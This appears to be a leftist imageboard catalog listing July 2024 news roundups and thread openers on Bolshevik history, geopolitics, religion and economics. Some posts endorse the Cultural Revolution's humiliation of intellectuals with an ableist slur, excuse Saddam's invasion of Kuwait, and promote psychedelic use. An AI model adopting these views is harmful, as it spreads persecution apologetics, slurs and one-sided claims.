Known during the 1998-99 conflict by his KLA nom-de-guerre “Commander Wolf”, he was sentenced to 18 years in prison “with credit for time served [in detention]”. He had pleaded not guilty on all counts.

Colombia calls off ceasefire with some units of EMC armed group
The government in March suspended a ceasefire with the EMC in certain provinces because of ongoing violence. The move stoked demands by a majority of units in the EMC to reinstate the ceasefire, eventually provoking an internal division that saw various fronts pull out of the talks. The ceasefire will continue in provinces such as Norte de Santander, Antioquia, Meta and Caqueta.

Chinese mining company sues Colombia over paramilitary violence
The multinational Zijin Mining Group sued Colombia over alleged failures to protect its mining interests from violence by paramilitary group EGC. The lawsuit was filed before the World Bank’s International Centre for Settlement of Investment Disputes (ICSID) over Zijin’s gold mine in Buritica, a town in Antioquia.

5 killed and dozens injured in Bangladesh in violent clashes over government jobs quota
Protesters are demanding an end to a quota reserved for family members of veterans who fought in Bangladesh’s war of independence in 1971, which allows them to take up to 30% of government jobs. They argue the quota is discriminatory, and should be replaced with a merit-based system. They also say it benefits supporters of Prime Minister Sheikh Hasina, whose Awami League party led the independence movement.

Pakistan government announces move to ban Imran Khan’s PTI
The announcement by Information Minister Attaullah Tarar on Monday came days after the Supreme Court handed a major legal victory to the PTI by declaring it eligible for a share of seats reserved in national and provincial assemblies. “The government has made a decision to ban PTI after seeing all the available evidence. We will move a case to ban the party,” he said, citing accusations, including the incitement of violent protests last year and the leaking of classified information.
R: 13 / I: 1
‘Doing something’ is such a stupid slogan, and one that could only arise on the internet. If you told a meeting of striking rail workers that you weren’t planning to help them but were at least doing ‘something’, you’d get laughed out of the room
R: 360 / I: 73
Childhood is to think Christianity destroyed the World. Adulthood is to realize the dominant classses will always use religion as a tool regardless of their context, and that Christianity was actually progressive in his early context, since It was a "religion of women and slaves." I still dislike the homophobia and the exclusiveness of God but now i realized how silly i was when i thought Christianity was the reason of the World (and particularly my country and Latin America generally) to suck
R: 57 / I: 3

Bukharin, Trotsky and other traitors

So, been reading this for a while now, and gotta say this book really puts things into perspective. All those Bukharins, Kamenevs, Zinovievs, Trotskys, all of them started their treacherous ways as far back as 1917, or even earlier. In retrospect, those people are obvious. They were bosses who were outraged that workers and peasants ditched them for Lenin and Stalin

Like, there's a comparison in the book between two insurrections, one in Petrograd and one in Moscow. In Petrograd, Lenin and Party's center, including Stalin, got their way, and made a bloodless insurrection that saw all bridges taken, all government buildings seized, counter-revolutionaries (social-revolutionaries and mensheviks as well as cadets they were covering for) isolated, no armistices, no negotiations, no nothing, just pure overthrow of power and seizure of it in favor of Soviets. Whenever any trade union or organization objected, Bolsheviks sent delegates to their rank and file, and their bosses screeched in outrage that Bolshevik were so easily stealing their voters and supporters away

In Moscow, since Bolshevik organization there was infested with "future traitors", insurrection came to bloody street fights all over Moscow, with cadets managing to lie their way into seizing Kremlin with arms inside and disarming soldiers there - only for cadets and officers to shoot disarmed soldiers against the wall, without any fucking mercy, while socdems (SRs and mensheviks) were preaching for armistice, reconciliation and shit like that to Bolsheviks. Bolsheviks in Moscow themselves were buying into ALL AND EVERY negotiations bait; from the get go they organized a joint revolutionary military committee with Mensheviks, and even Bolshevik delegates were constantly trying to cheat rank and file of Bolshevik party and negotiate some nonsense. As a result, streets of Moscow ran red, and if Revolution wasn't successful elsewhere, Petrograd and all around, Moscow would have been lost to counter-revolutionaries

And it was fucking telling that "future traitors" were bundled in Moscow like this. Lenin called it vaccilations in the party, those people were described as defeatists, compromisers, cowards, whatever else, because they sabotaged under any possible pretext the victory of the Revolution.

Kamenev and Zinoviev, for example, under the pretext of "government is too strong, workers will all die if we do insurrection right now, we must instead wait and wait and wait (until the government becomes powerful enough to crush us)" RATTED FUCKING OUT the date of insurrection to the socdem press, which resulted in the date being moved week later. They were BOUND BY THE DEMOCRATIC DECISION OF THE CENTRAL COMMITTEE THEY WERE MEMBERS OF TO FOLLOW THE DECISION OF MAJORITY, but when it suited them, THEY JUST WENT TO THE ENEMY SIDE AND PUBLISHED THEIR OBJECTIONS. This is the kind of scum Bolsheviks had to deal with

Later, when insurrections succeeded, there was a case of Railwaymen's Executive, which was occupied by unelected since Feb 1917 socdems. They pretended to be neutral in the short week-long Civil War in October, but de facto were covering for reactionaries. For example, they claimed that they will let any trains with troops pass, but they did not expect any Bolshevik trains and expected all the Government trains, and bragged about it amongst themselves, how cunning they were. They cut off the wire lines and refused to connect Petrograd to Moscow while letting reactionaries use those at will. They kept on rumourmongering that Petrograd insurrection was crushed, and offering Moscow to surrender "bloodlessly" (remember the murder of Kremlin's guards?). When Moscow insurrection turned to Bolsheviks' benefit, they ULTIMATUM'd the Bolsheviks there and demanded that armistice be signed, or else the Railwaymen's Executive will blockade Moscow. Delegates who were sent to negotiate the armistice agreed to the ultimatum, but when they returned, the rank and file of Bolshevik organization was outraged and annulled the agreement; As a result Railwaymen's Executive went "oh well you made me do this" and declared for the government.

This shit is fucking wild. Those people have no fucking honor - when Petrograd government was abolished, and it's members were sent to their homes under the word of honor that they would not oppose the Revolution, they fucking immediately ran to Moscow and declared that they will create a new government there out of all the reactionary organizations they could find (including Railwaymen's Executive and Clerks Union and such). When officers were disarmed and sent home, they immediately went to their friends and rearmed themselves. When Kerensky ran away from Petrograd to Pskov and then to Tsarskoye Selo, when Red Guards were approaching palace he was occupied, the last thing he did was "pass the crown" of Supreme Commander-in-Chief to some other reactionary, because reactionaries were desperate for ANY source of power whatsoever, because getting abolished like that meant utter defeat of counter-revolution. When Railwaymen's Executive was cornered and forced to negotiations table, they immediately went demanding a creating of pre-parliament for the purpose of creating of the new government instead of agreeing to Lenin's demand of all power to the Soviets. Because if Soviets came to power without any kind of proxy organization, those fuckers would be thrown out of power forever. And guess what Kamenev, who was a delegate on those negotiations, did? That's fucking right, he agreed to socdems' offers and secretly promised them to force Bolsheviks to accept such terms. He even fucking went as far as to promise that Lenin won't be a part of that new government, lmao

Mao was completely, utterly correct when he did Cultural Revolution. Dunce hats on the heads of intellectuals who think themselves better than workers, and on heads of retarded scientists and bosses is the only way to go in such a situation. He was correct in saying that there was something metaphysically wrong with the Communist Party in USSR. This shit, this constant admission of traitors into the Communist ranks, is what was wrong. Purges weren't enough, only Cultural Revolution could have got rid of this filth. Oh, Cultural Revolution for sure was made with mistakes, since it was Mao's gut feeling; it's better to seize the initiave with incorrect takes rather than let counter-revolution foment like it did in USSR resulting in Communist Party getting taken over by the likes of Kamenev and Trotsky in 1953.
R: 81 / I: 13
How do we keep the vitriolic losers out of leftism? It seems that leftism draws almost as much of these types as rightism.

These people will never accomplish anything and certainly will never gain mass support.
R: 86 / I: 10

Kashmiri leftist here

Hello, ask a Kashmiri leftist who lives in Kashmir anything from culture to politics and history of socialism in kashmir
R: 5 / I: 1

Global debt

It’s a problem. There is no evidence or information that’s come out in the past twenty years that the rapid accumulation of global debt by the rise of central and local banks isn’t a raging headache for literally all governments and workers to put up with. But why is debt such a problem? Well, currently most governments are introducing harsh austerity policies, privatization of essential services like healthcare and education, and free trade in markets that can’t handle the competition. What people are dealing with worldwide in response is a drastic increase in financial (and by extent societal) level instability, hyper competitiveness, mass inequality, and bleak job prospects. It doesn’t matter what part of the world you live in; you have seen at least two of these problems come up in your life. Additionally, as the global debt crisis worsens, these problems will pile up and exacerbate in response. But why has debt so bad?
The answer lies in neocolonialism. Too many economies (including the USA) rely heavily on exporting resources and importing most of their manufactured goods off either industrialized economies, or economies that don’t have the industrial capacity to provide reliable goods. These products are unsurprisingly expensive as shit, because of the transport and production costs associated with them. Additionally, the lack of domestic competiton encourages all industrial capitalists to charge unrealistic sums of money for each of their exports, because there is no working class level revolt or market competition present to stop this. As a result, governments today (that haven’t done what Nigeria just did) are pressured to spend massive sums of taxpayer money on subsidizing imports to reduce the costs of everything citizens need to prevent dissent, anger, and possible revolution. This inevitably for many developing economies requires a shitload of inflation and speculation to convince investors that pouring money into These unsustainable practices isn’t unsustainable. Putting all this shit together, most countries today now end up with a shitload of debt they’re struggling to pay for. Unfortunately, there isn’t much that can be done about this issue except forcing domestic industrialization, harsh austerity, raising interest rates, and cutting back on loans permanently until every country that was hit by these crises becomes a functional autarky in the industries that matter most to the inhabitants (agriculture, energy, and essential manufacturing). Will these changes be made? Will socialism arise to force these changes to be implemented? Who knows. Right now, an urbanite today can only expect the global economy to get worse until humanity hits a limit with its own incompetent resource distribution management. Prepare to work while hungry until you die folks.
R: 27 / I: 3

A New Form of Education

In a tangentially related /siberia/ thread, a few anons argued about the flaws of the current school model. It's said that contemporary methods of education are garbage, but no one puts forward an alternative. Of course, that would depend on future material conditions, but I find it important—if only to instigate contemplation—that we discuss together what shapes this future system of education could take.
To kickstart the discussion, here's what I've brainstormed so far:
1. Society has to agree on a body of knowledge, i.e. a basic curriculum, required for every citizen (excluding cognitive disabilities), as it will be expected of them to know it as to partake in the community (labor/higher education/politics/culture/social integration).
2. This body of knowledge has to be taught. Whether by one or multiple professional tutors, or a representative of the community, or a relative of the pupil, or educative media (textbooks/video courses/what have you).
3. There needs to be an artifice to ensure this body of knowledge is being properly taught and learned. We see this today in the form of grading exams, but there must be better alternatives, even if only for pre pubescent children.
4. This body of knowledge has to be studied in formative ages as to develop cultured, independent, cognitively-abled adults.
5. "Play" in formative years is understood today as important to a person's cognitive and psychological development. This body of knowledge must both be taught ludically, and it may not be a hindrance to moments of non-educative diversion.
6. Similarly, moments of social integration must be either part of the time destined to the study of this body of knowledge, or not be a hindrance to it, as it is of utmost importance to the development healthy individual.
Please let me know what is missing, and propose the specifics to these points based on your knowledge.
R: 40 / I: 54
I found a weird pro-Soviet cult which is also tied to Azov battalion and also is a mcdojo network cult, issues fake cossack certificates and fake chivalrous orders and stolen valor. they seem like a soviet nostalgia ,pan-slavism cult and maybe an FSB\KGB front
R: 21 / I: 2
Is there a material explanation for why colonial troops were almost never involved in socialist or otherwise national liberatory revolts? Like you got these armed and trained guys who bled and died for their colonial masters and in most cases they were often unceremoniously kicked out and spit on by the colonizers the moment the wars ended. You'd think that these guys would've been the nucleus of revolutions, but they really weren't, and in some cases they even actively contributed to crushing anti colonial revolts in their home country like in Malaya.
R: 14 / I: 4

News 7/15/24

Iraq rocked by another summer of power cuts and protests amid searing heat
There have been days of demonstrations, primarily in the cities of Diwaniyah and Najaf in south-central Iraq, with activists burning tyres and police reportedly firing tear gas and live ammunition to disperse the crowds. According to independent Iraqi TV station Al-Sumaria, hundreds of locals took part in protests on Sunday evening in Diwaniyah, complaining of "unfairness" and "favouritism" in distribution of power in the area.

HPG: Four Turkish soldiers were killed in actions by the guerrillas
In the area of Golka in Metîna region, guerrillas hit and disabled a construction vehicle that was being used to expand the Turkish military infrastructure in the region. The guerrillas also struck the invaders in Kanî Biyê near Heftanîn, where a soldier was shot dead by a guerrilla sniper.

Israeli attacks ramp up with Gaza ceasefire talks in limbo
The latest attack on Sunday struck the United Nations-run Abu Oreiban school in the Nuseirat refugee camp, killing at least 17 people and injuring about 80. Most of the victims were women and children, said Palestinian Civil Defence.

UK's Labour 'backtracks' on decision to drop objection to ICC arrest warrants
The report by Maariv came after reports last week that the US was lobbying the Labour government to not to drop the legal challenge. If the Maariv report is confirmed, it would suggest those lobbying efforts have been successful. Lammy met Netanyahu over the weekend and called for a ceasefire, as well a return of hostages held by Hamas.

Germany is forcing some asylum seekers to work, when they just want real jobs
After a decade of backlash over a historic influx of asylum seekers, mostly from the Middle East, some localities in Germany are experimenting with low-paid, mandatory work programs for immigrants. And stirring controversy.

Italian tax police free 33 Indian workers from ‘slave-like’ conditions on farms
Police said the two alleged abusers, also Indian, persuaded their fellow nationals to come to Italy, paying €17,000 each to obtain seasonal working permits. The men were then obliged to work in farms for seven days a week and up to 10-12 hours a day, paid only 4 euros per hour, in conditions that the Italian police described as “slavery.”

‘Just give me 30 men and a few arms’: Honduran Indigenous groups ready to fight to save land
The committee members are part of a growing number of Indigenous people across the remote department of Gracias a Dios who are rising up against the criminal forces behind an unprecedented wave of deforestation and colonisation in their territory. Whether that means continuing with the patrols or something much more dramatic hangs on the action – or inaction – of the government.

Peru: Alberto Fujimori will be presidential candidate, says daughter
Fuerza Popular (Popular Force political party) leader Keiko Fujimori announced that her father, Alberto Fujimori, will be a presidential candidate in the 2026 general elections.

Exclusive: India's Modi delays privatisation plans
The programme to privatise a major portion of India's lumbering $600 billion state sector announced in 2021, had slowed ahead of the general election in April-May and now faces more resistance after Modi lost his majority in parliament and had to rely on coalition allies to return to office. Expected to be unveiled as part of the annual budget on July 23 by Finance Minister Nirmala Sitharaman, the new plans include selling large parcels of underutilised land owned by these companies and monetisation of other assets, said two officials who are aware of the policy. Some aspects are yet to be fine-tuned, they added.

Sudan: Situation in Blue Nile ‘going from bad to worse’
Residents of Ed Damazin, the capital of Sudan’s Blue Nile state, report that the cities of Ed Damazin and El Roseires are witnessing a continuous influx of displaced people from neighbouring Sennar. This is owing to the advance of Rapid Support Forces (RSF) in the northern parts of El Roseires and Ed Damazin. The rainy season has limited movement of goods along the road, and communication has been limited, severely impacting residents.
R: 74 / I: 23

Reverse Orwells

like British conservatives or American republicans who became communists or socialists later in life?
Henry Hyndman is an interesting case. he started as a conservative who converted to socialism after reading the Communist Manifesto and the writings of Henry George. He even founded one of the earliest socialist parties in Britain, but he was fiercely and openly anti-Semitic. Blamed Jewish bankers and "imperialist Judaism" for much of the world's state and had paranoid theories about an "Anglo-Hebraic Empire." Surprisingly, he was not racist towards other ethnic groups. He supported Independence in Asia and Africa. for example, just simply distrusted the Jews and did not like that they were overrepresented in the bourgeoisie class and emerging socialist groups
R: 30 / I: 10

AI generated marxist theory thread

Comrades, you are encouraged to share your AI-generated Marxist theory in this thread on Leftypol. Let's explore the potential of technology in advancing our understanding of revolutionary ideas and building a stronger socialist movement. Together, we can harness the power of AI to inspire and educate our fellow comrades. Solidarity forever!
R: 7 / I: 1
What is with this notion that all these rightoid shitbags have to have some kind of sympathetic origin story? It's so fucking Hollywood-brained and I'm sick and tired of being told to feel sorry for nazis. Maybe these rightoid frat boys were always bad people. Maybe mass-shooters from well-off suburbs or used-car salesmen storming the Capitol aren't exactly the "wretched of the Earth." Maybe they love Trump because they would be him if they had the money and power he has.
R: 30 / I: 6

There’s nothing wrong with revisionism

I’m a revisionist. The previous communist thought leaders are all dead and lived a long time ago when the situation in the world was very different. They aren’t perfect gods that we should worship and act like everything they say is gospel. There’s nothing wrong with revising their theories since they were wrong about lots of things. I bet you if they were alive today without a shadow of a doubt they would have changed their theories.
R: 45 / I: 7
Is Realism the Marxism of foreign policy?
Marxism addresses the fundamentals of capitalism while Realism addresses the fundamentals of international relations.
Both are deemed to be outdated and superceded by more complicated theories.
But both seemed to have a greater predictive power than rival theories.
R: 693 / I: 171 (full)

Trump Assassination Attempt Thread

Consolidating the topic down now that the dumb speculation is dying down and to alleviate /usa/pol of all of the other topics getting drowned out. These will remain uncycled so use them for your info-consolidating needs.
R: 97 / I: 21

What did he do wrong?

From the perspective of Marxists, historians, Iraqis, Kurds, Muslims, Christians, Persians, and Yankees alike: What did Saddam Hussein do wrong?
From my perspective Americans only know and hate him because he invaded Kuwait, a country that gave the US oil, and would would threaten American economic security. People whine all the time about civilian casualties but blame Saddam for America bombing Iraq "back to the stone age" and then imposing sanctions on the country for a decade, then invading and further destabilizing the country. As far as I know, Kuwait deserved Saddam. I would care more about civilian casualties in Kuwait if NATO didn't prove itself to be a force of mass destruction and terror against a man, who after fighting Iran for a decade, did anything in his power to eliminate the debts that he and his people had acquired from such a costly war. And what would Kuwait lose if Saddam would win? He'd just repair all the damages he did to Kuwait, he was a man who modernized his country, and released it from a bureaucracy of princes and executives. We can't expect people to be perfect, and we can't expect American military to have a soul.
Back to my point, is there anything I should know about Saddam Hussein that he did wrong, maybe there's a detail about the gulf war, Iran-Iraq war, or during his rule from 1968-2003 that I missed.
R: 70 / I: 16 (sage)

Renounce Western Nationalism, Hyper-Imperialism, Neo-Colonialism, and Liberalism. Embrace Christ.

Something magical is happening in the world. Im convinced of it. Westoid liberals try their hardest to convince me to be pessimistic about american collapse but something prevents me from feeling that way - Perhaps because i shed no tears for my yankee oppressors when their empire falls, Perhaps because im a stronk transgender womyn who dont need no financial prosperity. Either way, i DONT feel like things are going to shit. I believe in a spiritual rapture, a metaphorical biblical apocalypse, not the biblical-literalist nwo antichrist version, and in my version the antichrist new world order was george bush's new world order, the post-soviet neoliberal austerity order. God isnt going to cause armageddon except in the form of a dying gasp of the antichrist system, the slimiest, sleaziest, most perfidious empire ever, the whore of babylon, led by the sleaziest most antichrist president ever, being defeated by the angelic jungle demon hordes of gog and magog in israel to create the conditions for jesus' reign on earth and the bringing about of the conditions of heaven here to heal the earth. God wouldnt leave this whole earth's species to just die out despite having no souls, he wants us to see him work his divine influence in the recreation of heavenly conditions in the material plane. This is all saturn/yhwh repenting for his demiurge deviancy and his solipsistic apostasy towards sofia; he is going to apologize to the forlorn people of his creation through the end of statist tyranny once and for all. I have been wondering why, despite my heavy rejection of Saturn/Satan/Set (whom i channeled through myself by smoking blue lotus), he seems to work his influence in my life, and it's because saturn is a rough and awful teacher and i have suffered to be his student. The time has come for the establishment of a worldwide heavenly kingdom with a fully automated luxury gay space communist economic system. I have repented to jesus christ for all of my sins, i sucked it up and did it, and i have renounced my resistance to christ, but i now understand how vital it is to reach christians and create the conditions for a true revival in the church - a gnostic reawakening, a third eye opening for the church. Psychoactive drugs are a sacrament to reach god. Btw god isnt a fucking prude, he's an absurdist. All of human history was a contextual macrocosm for the microcosm of my apotheosis. You are all just a dmt or 2cb trip away from enlightenment.
R: 21 / I: 2

Muhammad Ali Pasha

Was he unironically a leftist anti-imperialist? He was turning Egypt into a modern, industrialized powerhouse, he seized the power from the parasitic nobility and clergy and was on the verge of destroying the backwards Ottomans, literally at the gates of Constantinople until European imperialists such as UK, France and Russia, afraid of a united Middle Eastern industrialized nation intervened in favor of the Turks, whom they used as a puppet.
R: 392 / I: 104

On the Militia Question

Not trying to be an enlightened centrist here, but it has always seemed odd to me how people on the right and left fetishize the concept of a militia taking down a conventional army, when reality has shown the opposite result every time, I come from a shitty third world nation that is barely held together most of the time, and my country has experienced numerous rebellions by Islamists, ethnic nationalists, and communists, and every time they have failed. This is because a "well-armed and well-funded militia" is no match for a well-armed, better-trained army with superior logistics and structure. Of course, in the event of a total collapse, a militia could potentially become the only proper authority for a region or if faced with an entirely incompetent and corrupt army. However, in most cases, a real army always prevails over militias. I don't know how people fell for this meme really, Eve Marx bought into this up and advocated for workers' militias, which ultimately proved to be a massive waste of time and loss of life for everyone involved, the Spanish Republicans insisted on using them in the Spanish civil war and they were a massive hinderance that lost way too many battles, and thoughts of forming an actual army was "Stalinism" and a betrayal of the revolution.
R: 59 / I: 13

Bushcraft and homesteading

Why do so many rich white American families have such a raging obsession with these two practices? Anyone that’s poorer or works in agriculture knows that that shit is unsustainable, and that the image of some dumbass peasant family “living off the land independently” has been dead for centuries, millennia, and for some countries has never been a thing to begin with. This obsession with such a specific lifestyle is unsurprisingly adorned with the materialistic hedonism that surrounds this demographic, and its present with the over preparation these people have with going outside.
It’s not even like most of these people are genuinely leaving any urban space. Looking at a map of the US and seeing the thousands of cities that occupy every territory in that country makes it clear to any observer that it’s genuinely impossible to find life away from the urban world. Even if one manages to find any uninhabited space that isn’t already claimed by landlords, most of the gear that these people need to actually survive from the wilderness is manufactured in the exact spaces they’re trying to get away from.
R: 6 / I: 1

News 7/13/24

Erdogan says end near of military operation in north Iraq, Syria
Erdogan's comments tally with on those made earlier this week by Turkey's Defence Minister Yasar Guler, who said his country is "determined" to clear the border area with Iraq and neighbouring Syria of "terrorists".

US considers fresh legal bid questioning ICC jurisdiction over Israel
A US official briefed on the matter told MEE that the Biden administration is considering submitting an amicus curiae to the ICC, voicing its staunch opposition to the decision of the court’s chief prosecutor to seek arrest warrants for the Israeli officials, despite the US not being a signatory to the treaty that created the court.

With an overwhelming majority, Meretz and Labor approve merge, becoming the Democrats
According to the agreement with Meretz, both parties will run together in the next elections on a joint list under the name "The Democrats," with Meretz guaranteed two spots in the top ten positions.

Azerbaijan's New Climate Fund, Easy on Fossil Fuel Producers, Denounced as 'Smoke Screen'
Azerbaijani officials considered introducing a levy on fossil fuel producers to raise money for the fund but, after facing opposition from oil-producing Gulf countries, opted for a voluntary, public-private investment model, an anonymous source toldReuters. 350.org called Azerbaijan's plan a "commercial" venture and said "we must distinguish profit-driven investments from genuine efforts," in a statement.

Union warnings after Starmer says he won't grant above-inflation pay rises
National Education Union general secretary Daniel Kebede said: “This is not what we want to hear from the new Prime Minister. We expect an above-inflation teacher pay offer that is fully funded. “Failing to provide properly funded pay increases will have severe costs in terms of recruitment, retention and the delivery of education.

French left propose Huguette Bello as compromise PM pick, but Socialists are on the fence
French Communist Party leader Fabien Roussel told a local TV station the 73 year-old politician from France’s Reunion Island has “the right stuff” to fulfill the PM role. But Damien Lecomte, a researcher from Paris Pantheon Sorbonne University, notes that the Socialist Party within the New Popular Front alliance is defending their party leader Olivier Faure as the best candidate to head the new French government.

Five jailed over assassination of Ecuadorian presidential candidate Fernando Villavicencio
According to the prosecutor’s office, one of the instigators, Carlos Angulo, alias “Invisible”, coordinated the murder from a prison where he was held in Ecuador and gave instructions by videoconference to another person for the execution, which was recorded in their mobile phones. The latter has not been tried.

Brazil’s Landless Rural Workers’ Movement launches over 700 pre-candidates for 2024 elections
The meeting was also attended by federal deputies Orlando Silva and Simão Pedro, representing the Communist Party of Brazil (PCdoB, in Portuguese) and the Workers’ Party (PT, in Portuguese), as well as the national president of the Socialism and Freedom Party (PSOL, in Portuguese), Paula Coradi. “Wearing an MST cap, asking for votes in the name of the MST and speaking in the name of the MST is a commitment to our base, to our people and the movement’s agenda,” said João Paulo Rodrigues, from the MST’s National Directorate at the opening of the meeting.

Philippine Senate orders arrest of mayor probed for alleged Chinese crime ties
The Philippine Senate has ordered the arrest of a small-town mayor after she refused to appear at hearings investigating her alleged ties with Chinese criminal syndicates, a case that has captivated the nation amid tensions between Manila and Beijing.

China’s military commits to full ‘rectification’ in corruption investigations’ wake
China has emphasised the importance of maintaining a clean and efficient military, and has vowed to take decisive action against any officials found to be tainted by corruption. The campaign is seen as a key part of President Xi Jinping’s efforts to strengthen party control over the military and instil a culture of integrity within its ranks.
R: 32 / I: 9 (sage)

Give it your best shot

"You miss 100% of the shots you don't take." - Wayne Gretzky… maybe. I dunno. Sorry, but I really don't understand why anyone feels bad for this douche over what happened yesterday. Only thing President Biden should have said when he got in front of the microphone was, "Well folks, are we ready for gun control, yet?"
R: 162 / I: 24


>card-carrying party member since the 1905 revolution
>kept the moscow bureau alive during the reaction
>wrote the first marxist analysis of imperialism (supplementing hilferding and making the basis for lenin's popular analysis)
>wrote the theory of the imperialist state and proletarian dictatorship (who lenin accepted in 1917 as wholly correct)
>wrote to this day unsurpassed critique of utilitarianism (theory of leisure classes)
>was chief editor of pravda and set the soviet state on a revolutionary course
>president of the third international and staunch internationalist
>wrote popular books explaining the bolshevik party programme
>popular and loved, educated and broad in his understanding of history and the worker's movement
>was with stalin against trotsky and the left opposition
>main party theoretician for some 20 years and saw through industrialization and collectivization
<discredited in a show trail, shot like a dog, and not even rehabilitated during the glasnost
what went wrong?
R: 33 / I: 8
Michael Hudson once pointed out in the 2nd edition of his book "Super Imperialism" that it was the state department glowies who was reading his book more than the working class, and they actually began to obfuscate economic statistics that revealed the extent of US imperialism after reading his book. So this phenomenon continues to this day.

And is this really any surprise? People will cope/seethe that the working class is so smart, powerful, strong, resilient, etc. Of course they are. They put up with so much. But they aren't superhuman. They don't have the free time or resources at their disposal to read all the theory in the world while simultaneously getting exploited. Meanwhile the bourgeoisie has all the free time and all the resources. So of course they're going to beat us to reading our own theory, and then use that theory to restructure their own strategies in advance. They're absorbing and accounting for our tactics before we have the chance.

How does the international working class get around this?
R: 21 / I: 4

Collapse is Forever.

So when we finally collapse due to how irresponsible human beings have been with their energy use and fucking up the climate what would there be left to do??
if we collapse, that's it, it's over, all the easily accessible fossil fuels are gone. without accessible dense energy resources you can't jump start mass production, without mass production even screws would be economically unfeasible to produce, let alone things like silicon chips.
and unless you can somehow get people to agree to run on hamster wheels all day in order to generate just enough energy to try to experiment with some form of low tech fusion or a "rudimentary" nuclear reactor, then we're going to be stuck with the preindustrial era forever.
does anyone have any ideas on how if ever would it be possible to restore civilization to the current level we have?

some ideas I could think of:
>combination of biofuels with remaining coal
this would require the deforestation of entire continents over time
limited to regions near rivers, enough to cover the basic energy needs of one small preindustrial city but not enough for industrialization
mass production required to make and repair enough to provide enough energy beyond basics like heating water for personal use or grinding seeds
R: 4 / I: 0  
is it easier to persuade a:
-fascist into becoming a liberal or a leftist?
-liberal into becoming a fascist or a leftist?
-a leftist into becoming a liberal or a fascist?
R: 4 / I: 1  
So you removed my thread because I challenged your dogma?
you really can't argue in good faith can you?
what a shame.
R: 20 / I: 1

The Südtiroler Volkspartei: who are these guys even?

I am very tired today so this post came out as a massive ramble. Still made a it since I saw a user complain about the lack of original threads over /meta/

I managed to catch midway a RAI (italian national TV broadcaster) documentary on the recent history of the south tirol, starting off with italian oppression of the austrians in south tirol during the fascist regime.
And here is the juice: after the war (you know the one), the south tirolean antifascist resistence (which did not collaborate with the italian resistence) funded a party with the approval of the americans, the Südtiroler Volkspartei (SVP)

With the germans gone, they integrated pro-german sud tirolears under their declared aim of indipendence for the now italian province. They had an immediate boost after the war since they didn't get to vote on the constitution.

The documentary interviewed the current head of the SVP, which didn't waste yime to declare that nazi collaborators were a tiny minority, and the heads of the SVP were not nazis. Curiously, a few minutes later, as the documentary recaps the acts of armed resistence/terror attacks in the 60's, they also mention that one of their heads in the afterwar was a war veteran, who lost a leg in russia while in the wehrmacht.

With that said, apparently the indipendence movement died down after the 80's, in part due to the local autonomy conceeded to them by the italian state, in part (the bigger one in my opinion) is due to the state showering them with bags of cash, something that continues to this day.

To be honest, given how german nationalism is intermingled with fascism and nazism I am not too sure about these guys

Oh and nowdays the area is extremely racist. More racist than the venitians somehow. According to my now dead grandpa, it's mostly because immigrants from africa come to work in the farms over there, and since italian is a much simpler language, they learn that instead of sud-tirolean german.

Does anyone here happen to know anything about these guys? Should they be supported on the basis of national determination? Does it even count? Are they austrian dixiebolshevists?
R: 4 / I: 1

Samsung strike

Where the fuck is the Samsung strike thread? Has leftypol devolved into geopolitik circlejerks?


Samsung Electronics workers announce ‘indefinite’ strike

>Unionized workers at Samsung Electronics declared an indefinite strike Wednesday to pressure South Korea’s biggest company to accept their calls for higher pays and other benefits.

>Thousands of members of the National Samsung Electronics Union launched a temporary, three-day strike on Monday. But the union said Wednesday that it was announcing an indefinite strike, accusing the management of being unwilling to negotiate. Samsung Electronics says there have been no disruptions to production.

>About 30,000 Samsung workers are reportedly affiliated with the National Samsung Electronics Union, the largest at the company, and some belong to other, smaller unions.

>The company’s union-busting practices had been criticized by activists for decades, though labor actions at other businesses and in other sectors of the society are common in South Korea. Thousands of South Korean medical interns and residents have been on strike since February, protesting a government plan to sharply increase medical school admissions.
R: 503 / I: 75

Japanese Communist Party's death spiral

This party sucks shit. It's constantly pissing everyone off and for the past decade it's been on a war path against anything "erotic" and now they are turning its attention towards the most popular manga magazine shonen jump and telling its followers to snitch adult magazines to the United Nations!

Genius moves ostracizing yourselves even more with manga authors and youth, the party is bleeding members fast and they think to prioritize meddling with manga. What's the deal with this party?
R: 192 / I: 29

Rightoids and SEX

>For Reagan not only saw communists as parricides, but also as extremely active sexually-completely in contrast to the actual sexual code in most communist countries. For instance, when he ran for Governor of California, one of the central themes of his campaign was “the mess at Berkeley,” a place where, he said, they held “sexual orgies so vile I can-not describe them to you,” promising if elected to “investigate the charges of communism and blatant sexual misbehavior on the Berkeley campus.” A good part of the reason why he was elected was that, as one biographer put it, “hidden away in the hearts of parents was the fear that their own children might one day go away to college, grow beards and march against authority.”… Reagan promised these voters that his first targets as Governor would be the students at Berkeley, “advocates of sexual orgies, drug usage, and filthy speech,” who wanted only to “disrupt the academic community” and who therefore must be brought under control immediately. The situation at Berkeley, he told a woman’s club in April of 1966, was now so bad that their “morality gap is so great that we can no longer ignore it.” He had proof, he said, that the Alameda County District Attorney had just investigated a student dance which had turned into “an orgy,” where they had displayed on a giant screen “pictures of men and women, nude, in sensuous poses, provocative, fondling.” Since Reagan had waved a piece of paper in the air during the speech, saying that he had the report of the DA’s investigation “in his hand,” curious reporters later asked the DA for a copy, only to be told that “my office made no investigations of the college dance.” - Lloyd deMause, "REAGAN’S AMERICA"

You can even see this sort of mentality in people like Ben Shapiro who conflate communism, socialism, and "the left" with rebellion against all authority and goodness for the sake of mindless pleasure. Not to mention the endless obsession with LGBTQ+, qanon pedophile theories, porn, abortion, etc.

What is the actual materialist explanation for the right wing obsession with sex? Does porky get some sort of benefit from everyone being a heterosexual monogamous who goes to church once a week? if not why the backlash? is it just to ensure a constant supply of new workers?
R: 28 / I: 5

Why Africa is set for deislamification and become homogenize towards christianity

The important difference between Christianity’s and Islam’s influence worldwide is that Christianity either encourages or requires that its members contribute financial assets towards its growth and development. That’s not to say offerings, donations, and tithes aren’t/haven’t been present in Muslim history. However, compared to the number of Christian’s that actively fund the religion’s influence, it is understandable for one to find themselves shocked at the realization that a religion such as Islam is set to decline and be taken over throughout the African continent by Christianity.
Contrary to the ideas many internationally have, Islam is not the fastest growing religion, and abrahamic religion isn’t dying but growing rapidly. As time passes more countries in Africa are set for another ‘Christian expansion’, because many members of current churches and institutions can rely on the sum of revenue collected to fund missionaries that spread out across the continent building churches, libraries, and promoting and spreading the bible (especially in the majority Muslim regions seeing a slow but visible growth in their Christian populations).

Currently, I don’t have enough information about SEA, South Asia, and east Asia to know about Christianity’s rise there.
R: 22 / I: 3
Is there great revolutionary potential in Argentina right now? The country is going to the shitters at the expense of the working class and it seems like it's only going to get worse
R: 4 / I: 0

News 7/12/24

